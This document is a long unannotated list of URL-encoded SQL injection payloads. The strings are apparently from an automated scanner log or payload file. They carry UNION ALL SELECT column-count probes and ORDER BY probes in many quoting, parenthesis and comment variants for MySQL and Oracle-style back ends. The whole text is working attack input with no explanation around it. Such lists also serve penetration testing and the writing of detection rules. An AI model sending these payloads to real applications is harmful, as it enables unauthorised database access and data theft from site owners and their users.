1%27%20%7C%7C%20%28SELECT%205406%20FROM%20DUAL%20WHERE%205688%3D5688%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205007%20FROM%20DUAL%20WHERE%207028%3D7028%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208386%20FROM%20DUAL%20WHERE%201534%3D1534%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207817%20FROM%20DUAL%20WHERE%209782%3D9782%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208217%20FROM%20DUAL%20WHERE%208212%3D8212%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209954%20WHERE%204926%3D4926%20ORDER%20BY%201--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207982%20WHERE%206833%3D6833%20ORDER%20BY%204326--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201265%20WHERE%206090%3D6090%20UNION%20ALL%20SELECT%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201541%20WHERE%202447%3D2447%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203215%20WHERE%207997%3D7997%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204512%20WHERE%207035%3D7035%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201414%20WHERE%209379%3D9379%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206507%20WHERE%207179%3D7179%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206230%20WHERE%206984%3D6984%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201708%20WHERE%205345%3D5345%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201501%20WHERE%207227%3D7227%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204947%20WHERE%201037%3D1037%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203202%20FROM%20DUAL%20WHERE%201096%3D1096%20ORDER%20BY%201--%20%20%29 1%20%2B%20%28SELECT%207946%20FROM%20DUAL%20WHERE%202259%3D2259%20ORDER%20BY%205305--%20%20%29 1%20%2B%20%28SELECT%202497%20FROM%20DUAL%20WHERE%204675%3D4675%20UNION%20ALL%20SELECT%20NULL--%20%20%29 1%20%2B%20%28SELECT%206819%20FROM%20DUAL%20WHERE%207997%3D7997%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206187%20FROM%20DUAL%20WHERE%201990%3D1990%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202570%20FROM%20DUAL%20WHERE%201008%3D1008%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%201255%20FROM%20DUAL%20WHERE%208312%3D8312%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202609%20FROM%20DUAL%20WHERE%204366%3D4366%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208773%20FROM%20DUAL%20WHERE%208737%3D8737%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208993%20FROM%20DUAL%20WHERE%202238%3D2238%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202380%20FROM%20DUAL%20WHERE%202814%3D2814%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204090%20FROM%20DUAL%20WHERE%207834%3D7834%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206346%20WHERE%205059%3D5059%20ORDER%20BY%201--%20%20%29 1%20%2B%20%28SELECT%203880%20WHERE%205924%3D5924%20ORDER%20BY%207790--%20%20%29 1%20%2B%20%28SELECT%207197%20WHERE%203359%3D3359%20UNION%20ALL%20SELECT%20NULL--%20%20%29 1%20%2B%20%28SELECT%206247%20WHERE%203092%3D3092%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206346%20WHERE%205369%3D5369%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%201140%20WHERE%201561%3D1561%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203350%20WHERE%201024%3D1024%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%201795%20WHERE%203140%3D3140%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205940%20WHERE%203249%3D3249%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209280%20WHERE%201966%3D1966%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202231%20WHERE%206307%3D6307%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204310%20WHERE%208492%3D8492%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%27%20%2B%20%28SELECT%20%27dCcF%27%20FROM%20DUAL%20WHERE%203218%3D3218%20ORDER%20BY%201--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Yxfs%27%20FROM%20DUAL%20WHERE%205151%3D5151%20ORDER%20BY%206104--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Wvpu%27%20FROM%20DUAL%20WHERE%207489%3D7489%20UNION%20ALL%20SELECT%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27VMdX%27%20FROM%20DUAL%20WHERE%206708%3D6708%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27QDqP%27%20FROM%20DUAL%20WHERE%206338%3D6338%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27XHsp%27%20FROM%20DUAL%20WHERE%206244%3D6244%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Llkh%27%20FROM%20DUAL%20WHERE%205762%3D5762%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27baQS%27%20FROM%20DUAL%20WHERE%209303%3D9303%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27oxhd%27%20FROM%20DUAL%20WHERE%209146%3D9146%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27PDWO%27%20FROM%20DUAL%20WHERE%206384%3D6384%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ACyW%27%20FROM%20DUAL%20WHERE%202413%3D2413%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27kIfo%27%20FROM%20DUAL%20WHERE%202535%3D2535%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27YEBw%27%20WHERE%209865%3D9865%20ORDER%20BY%201--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27evME%27%20WHERE%205878%3D5878%20ORDER%20BY%208021--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ioFi%27%20WHERE%205821%3D5821%20UNION%20ALL%20SELECT%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27vCCV%27%20WHERE%209876%3D9876%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27YEuP%27%20WHERE%206417%3D6417%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27qITt%27%20WHERE%207112%3D7112%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27kESz%27%20WHERE%203447%3D3447%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jvYu%27%20WHERE%206884%3D6884%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27dapb%27%20WHERE%209624%3D9624%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27TaOg%27%20WHERE%207332%3D7332%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27yBST%27%20WHERE%204941%3D4941%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Fdva%27%20WHERE%205767%3D5767%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%208419--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -7170%29%20ORDER%20BY%201--%20 -6630%29%20ORDER%20BY%204160--%20 -5972%29%20UNION%20ALL%20SELECT%206786--%20 -7121%29%20UNION%20ALL%20SELECT%204974%2C%204974--%20 -7926%29%20UNION%20ALL%20SELECT%205040%2C%205040%2C%205040--%20 -7619%29%20UNION%20ALL%20SELECT%207780%2C%207780%2C%207780%2C%207780--%20 -8843%29%20UNION%20ALL%20SELECT%206070%2C%206070%2C%206070%2C%206070%2C%206070--%20 -5921%29%20UNION%20ALL%20SELECT%202341%2C%202341%2C%202341%2C%202341%2C%202341%2C%202341--%20 -7443%29%20UNION%20ALL%20SELECT%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155%2C%207155--%20 -3655%29%20UNION%20ALL%20SELECT%203473%2C%203473%2C%203473%2C%203473%2C%203473%2C%203473%2C%203473%2C%203473--%20 -8863%29%20UNION%20ALL%20SELECT%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436%2C%201436--%20 -1026%29%20UNION%20ALL%20SELECT%203418%2C%203418%2C%203418%2C%203418%2C%203418%2C%203418%2C%203418%2C%203418%2C%203418%2C%203418--%20 -4733%27%29%20ORDER%20BY%201--%20 -3684%27%29%20ORDER%20BY%204029--%20 -6552%27%29%20UNION%20ALL%20SELECT%201317--%20 -8032%27%29%20UNION%20ALL%20SELECT%204075%2C%204075--%20 -2454%27%29%20UNION%20ALL%20SELECT%203901%2C%203901%2C%203901--%20 -8976%27%29%20UNION%20ALL%20SELECT%208820%2C%208820%2C%208820%2C%208820--%20 -1939%27%29%20UNION%20ALL%20SELECT%202816%2C%202816%2C%202816%2C%202816%2C%202816--%20 -8606%27%29%20UNION%20ALL%20SELECT%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578--%20 -1850%27%29%20UNION%20ALL%20SELECT%201192%2C%201192%2C%201192%2C%201192%2C%201192%2C%201192%2C%201192--%20 -8887%27%29%20UNION%20ALL%20SELECT%206622%2C%206622%2C%206622%2C%206622%2C%206622%2C%206622%2C%206622%2C%206622--%20 -2584%27%29%20UNION%20ALL%20SELECT%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711%2C%208711--%20 -4240%27%29%20UNION%20ALL%20SELECT%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551--%20 -1527%27%20ORDER%20BY%201--%20 -1251%27%20ORDER%20BY%204975--%20 -8094%27%20UNION%20ALL%20SELECT%201768--%20 -2399%27%20UNION%20ALL%20SELECT%203298%2C%203298--%20 -5406%27%20UNION%20ALL%20SELECT%201881%2C%201881%2C%201881--%20 -3618%27%20UNION%20ALL%20SELECT%208223%2C%208223%2C%208223%2C%208223--%20 -3674%27%20UNION%20ALL%20SELECT%209409%2C%209409%2C%209409%2C%209409%2C%209409--%20 -1624%27%20UNION%20ALL%20SELECT%207828%2C%207828%2C%207828%2C%207828%2C%207828%2C%207828--%20 -1798%27%20UNION%20ALL%20SELECT%203537%2C%203537%2C%203537%2C%203537%2C%203537%2C%203537%2C%203537--%20 -6466%27%20UNION%20ALL%20SELECT%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066--%20 -7787%27%20UNION%20ALL%20SELECT%208342%2C%208342%2C%208342%2C%208342%2C%208342%2C%208342%2C%208342%2C%208342%2C%208342--%20 -6675%27%20UNION%20ALL%20SELECT%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475--%20 -8708%22%20ORDER%20BY%201--%20 -9392%22%20ORDER%20BY%202740--%20 -5161%22%20UNION%20ALL%20SELECT%205624--%20 -5387%22%20UNION%20ALL%20SELECT%205611%2C%205611--%20 -4398%22%20UNION%20ALL%20SELECT%209941%2C%209941%2C%209941--%20 -3481%22%20UNION%20ALL%20SELECT%209708%2C%209708%2C%209708%2C%209708--%20 -7739%22%20UNION%20ALL%20SELECT%206624%2C%206624%2C%206624%2C%206624%2C%206624--%20 -3305%22%20UNION%20ALL%20SELECT%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335--%20 -8167%22%20UNION%20ALL%20SELECT%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115--%20 -7577%22%20UNION%20ALL%20SELECT%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667%2C%206667--%20 -3383%22%20UNION%20ALL%20SELECT%204301%2C%204301%2C%204301%2C%204301%2C%204301%2C%204301%2C%204301%2C%204301%2C%204301--%20 -3768%22%20UNION%20ALL%20SELECT%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742%2C%209742--%20 -8186%29%20ORDER%20BY%201--%20%20AND%20%286644%3D6644 -2181%29%20ORDER%20BY%204291--%20%20AND%20%287248%3D7248 -3459%29%20UNION%20ALL%20SELECT%201577--%20%20AND%20%285922%3D5922 -3221%29%20UNION%20ALL%20SELECT%207415%2C%207415--%20%20AND%20%284975%3D4975 -4828%29%20UNION%20ALL%20SELECT%201062%2C%201062%2C%201062--%20%20AND%20%283916%3D3916 -4029%29%20UNION%20ALL%20SELECT%205754%2C%205754%2C%205754%2C%205754--%20%20AND%20%286853%3D6853 -3053%29%20UNION%20ALL%20SELECT%209960%2C%209960%2C%209960%2C%209960%2C%209960--%20%20AND%20%287259%3D7259 -3525%29%20UNION%20ALL%20SELECT%208425%2C%208425%2C%208425%2C%208425%2C%208425%2C%208425--%20%20AND%20%282577%3D2577 -8215%29%20UNION%20ALL%20SELECT%206312%2C%206312%2C%206312%2C%206312%2C%206312%2C%206312%2C%206312--%20%20AND%20%289947%3D9947 -1498%29%20UNION%20ALL%20SELECT%206745%2C%206745%2C%206745%2C%206745%2C%206745%2C%206745%2C%206745%2C%206745--%20%20AND%20%288792%3D8792 -9888%29%20UNION%20ALL%20SELECT%207059%2C%207059%2C%207059%2C%207059%2C%207059%2C%207059%2C%207059%2C%207059%2C%207059--%20%20AND%20%288609%3D8609 -8679%29%20UNION%20ALL%20SELECT%205278%2C%205278%2C%205278%2C%205278%2C%205278%2C%205278%2C%205278%2C%205278%2C%205278%2C%205278--%20%20AND%20%288314%3D8314 -3953%29%29%20ORDER%20BY%201--%20%20AND%20%28%289851%3D9851 -6219%29%29%20ORDER%20BY%203375--%20%20AND%20%28%285870%3D5870 -4212%29%29%20UNION%20ALL%20SELECT%201194--%20%20AND%20%28%289761%3D9761 -3219%29%29%20UNION%20ALL%20SELECT%205229%2C%205229--%20%20AND%20%28%287725%3D7725 -8477%29%29%20UNION%20ALL%20SELECT%208398%2C%208398%2C%208398--%20%20AND%20%28%287124%3D7124 -7657%29%29%20UNION%20ALL%20SELECT%207555%2C%207555%2C%207555%2C%207555--%20%20AND%20%28%286214%3D6214 -9351%29%29%20UNION%20ALL%20SELECT%204125%2C%204125%2C%204125%2C%204125%2C%204125--%20%20AND%20%28%287255%3D7255 -1040%29%29%20UNION%20ALL%20SELECT%202046%2C%202046%2C%202046%2C%202046%2C%202046%2C%202046--%20%20AND%20%28%286253%3D6253 -4832%29%29%20UNION%20ALL%20SELECT%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992--%20%20AND%20%28%285758%3D5758 -5405%29%29%20UNION%20ALL%20SELECT%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549--%20%20AND%20%28%281895%3D1895 -3033%29%29%20UNION%20ALL%20SELECT%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843--%20%20AND%20%28%284335%3D4335 -2613%29%29%20UNION%20ALL%20SELECT%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509%2C%209509--%20%20AND%20%28%287916%3D7916 -7998%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%286134%3D6134 -6367%29%29%29%20ORDER%20BY%204608--%20%20AND%20%28%28%287820%3D7820 -6237%29%29%29%20UNION%20ALL%20SELECT%206613--%20%20AND%20%28%28%284031%3D4031 -3527%29%29%29%20UNION%20ALL%20SELECT%209716%2C%209716--%20%20AND%20%28%28%282135%3D2135 -9612%29%29%29%20UNION%20ALL%20SELECT%204915%2C%204915%2C%204915--%20%20AND%20%28%28%283244%3D3244 -2086%29%29%29%20UNION%20ALL%20SELECT%202141%2C%202141%2C%202141%2C%202141--%20%20AND%20%28%28%286601%3D6601 -9061%29%29%29%20UNION%20ALL%20SELECT%206686%2C%206686%2C%206686%2C%206686%2C%206686--%20%20AND%20%28%28%281032%3D1032 -3182%29%29%29%20UNION%20ALL%20SELECT%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211--%20%20AND%20%28%28%283341%3D3341 -4280%29%29%29%20UNION%20ALL%20SELECT%206064%2C%206064%2C%206064%2C%206064%2C%206064%2C%206064%2C%206064--%20%20AND%20%28%28%281466%3D1466 -2666%29%29%29%20UNION%20ALL%20SELECT%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066--%20%20AND%20%28%28%289887%3D9887 -9804%29%29%29%20UNION%20ALL%20SELECT%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667--%20%20AND%20%28%28%285536%3D5536 -1411%29%29%29%20UNION%20ALL%20SELECT%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597--%20%20AND%20%28%28%289057%3D9057 -5642%20ORDER%20BY%201--%20 -7420%20ORDER%20BY%206607--%20 -3718%20UNION%20ALL%20SELECT%203981--%20 -5073%20UNION%20ALL%20SELECT%202344%2C%202344--%20 -7766%20UNION%20ALL%20SELECT%201359%2C%201359%2C%201359--%20 -7165%20UNION%20ALL%20SELECT%209251%2C%209251%2C%209251%2C%209251--%20 -4727%20UNION%20ALL%20SELECT%203513%2C%203513%2C%203513%2C%203513%2C%203513--%20 -4351%20UNION%20ALL%20SELECT%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297--%20 -6593%20UNION%20ALL%20SELECT%201369%2C%201369%2C%201369%2C%201369%2C%201369%2C%201369%2C%201369--%20 -8044%20UNION%20ALL%20SELECT%209036%2C%209036%2C%209036%2C%209036%2C%209036%2C%209036%2C%209036%2C%209036--%20 -9608%20UNION%20ALL%20SELECT%202203%2C%202203%2C%202203%2C%202203%2C%202203%2C%202203%2C%202203%2C%202203%2C%202203--%20 -9658%20UNION%20ALL%20SELECT%206261%2C%206261%2C%206261%2C%206261%2C%206261%2C%206261%2C%206261%2C%206261%2C%206261%2C%206261--%20 -3223%27%29%20ORDER%20BY%201--%20%20AND%20%28%27QSln%27%3D%27QSln -9946%27%29%20ORDER%20BY%201699--%20%20AND%20%28%27qVDC%27%3D%27qVDC -1318%27%29%20UNION%20ALL%20SELECT%201460--%20%20AND%20%28%27ykEJ%27%3D%27ykEJ -1709%27%29%20UNION%20ALL%20SELECT%209382%2C%209382--%20%20AND%20%28%27WLPQ%27%3D%27WLPQ -1344%27%29%20UNION%20ALL%20SELECT%203291%2C%203291%2C%203291--%20%20AND%20%28%27mSGf%27%3D%27mSGf -8905%27%29%20UNION%20ALL%20SELECT%204300%2C%204300%2C%204300%2C%204300--%20%20AND%20%28%27FbBC%27%3D%27FbBC -1436%27%29%20UNION%20ALL%20SELECT%207826%2C%207826%2C%207826%2C%207826%2C%207826--%20%20AND%20%28%27wPgD%27%3D%27wPgD -6083%27%29%20UNION%20ALL%20SELECT%208432%2C%208432%2C%208432%2C%208432%2C%208432%2C%208432--%20%20AND%20%28%27vmjE%27%3D%27vmjE -3350%27%29%20UNION%20ALL%20SELECT%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247%2C%206247--%20%20AND%20%28%27GSmr%27%3D%27GSmr -8288%27%29%20UNION%20ALL%20SELECT%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477--%20%20AND%20%28%27nJPP%27%3D%27nJPP -4131%27%29%20UNION%20ALL%20SELECT%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516%2C%206516--%20%20AND%20%28%27oFrx%27%3D%27oFrx -4652%27%29%20UNION%20ALL%20SELECT%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391--%20%20AND%20%28%27aSMn%27%3D%27aSMn -2671%27%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%27RDRs%27%3D%27RDRs -9517%27%29%29%20ORDER%20BY%202187--%20%20AND%20%28%28%27NtYK%27%3D%27NtYK -2424%27%29%29%20UNION%20ALL%20SELECT%208478--%20%20AND%20%28%28%27KMSA%27%3D%27KMSA -7237%27%29%29%20UNION%20ALL%20SELECT%209307%2C%209307--%20%20AND%20%28%28%27WFzd%27%3D%27WFzd -2942%27%29%29%20UNION%20ALL%20SELECT%203437%2C%203437%2C%203437--%20%20AND%20%28%28%27CBvA%27%3D%27CBvA -8932%27%29%29%20UNION%20ALL%20SELECT%208237%2C%208237%2C%208237%2C%208237--%20%20AND%20%28%28%27wmQD%27%3D%27wmQD -4512%27%29%29%20UNION%20ALL%20SELECT%201156%2C%201156%2C%201156%2C%201156%2C%201156--%20%20AND%20%28%28%27sggr%27%3D%27sggr -9125%27%29%29%20UNION%20ALL%20SELECT%208282%2C%208282%2C%208282%2C%208282%2C%208282%2C%208282--%20%20AND%20%28%28%27MNym%27%3D%27MNym -6497%27%29%29%20UNION%20ALL%20SELECT%201619%2C%201619%2C%201619%2C%201619%2C%201619%2C%201619%2C%201619--%20%20AND%20%28%28%27APzs%27%3D%27APzs -3388%27%29%29%20UNION%20ALL%20SELECT%208608%2C%208608%2C%208608%2C%208608%2C%208608%2C%208608%2C%208608%2C%208608--%20%20AND%20%28%28%27QaxZ%27%3D%27QaxZ 